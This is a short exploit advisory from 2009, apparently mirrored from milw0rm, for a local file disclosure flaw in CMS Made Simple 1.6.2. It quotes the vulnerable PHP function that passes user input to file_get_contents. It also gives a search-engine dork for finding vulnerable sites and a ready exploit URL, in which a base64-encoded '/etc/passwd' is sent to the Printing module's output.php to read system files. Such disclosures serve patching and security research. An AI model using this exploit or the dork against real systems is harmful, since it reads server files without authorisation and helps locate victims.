CMS Made Simple 1.6.2 Local File Disclosure Vulnerability by h3m4n

VIEWS: 1,412 PAGES: 1

									                        CMS Made Simple 1.6.2 Local File Disclosure Vulnerability                   Page 1/1
  1    #########################################################################################
  2    #
  3    #          [CMS Made Simple <= 1.6.2]
  4    #
  5    # Class:      LFI
  6    # Reported:       29/07/2009
  7    # Public release: 10/08/2009
  8    # Remote:     Yes
  9    # DORK:       "This site is powered by CMS Made Simple version 1."
  10   # Site:       http://www.cmsmadesimple.org/
  11   # Download: http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple−1.6.2−full.tar.gz
  12   # Author:     R00T[ATI]
  13   # Contact:    r00t.ati@ihteam.net − http://www.ihteam.net
  14   ##########################################################################################
  15
  16   Vulnerability:
  17   ============================================
  18   function GetURLContent($url) {
  19       $content=file_get_contents($url);
  20       return $content;
  21     }
  22   =============================================
  23
  24   Exploit :
  25   ================================================================================
  26   http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
  27   ================================================================================
  28   L2V0Yy9wYXNzd2Q= <−−− /etc/passwd in base64
  29
  30
  31   #ihteam.net − Inclusion Hunter Team
  32
  33   # milw0rm.com [2009−08−10]




IHTeam                                                                                              08/10/2009

								
To top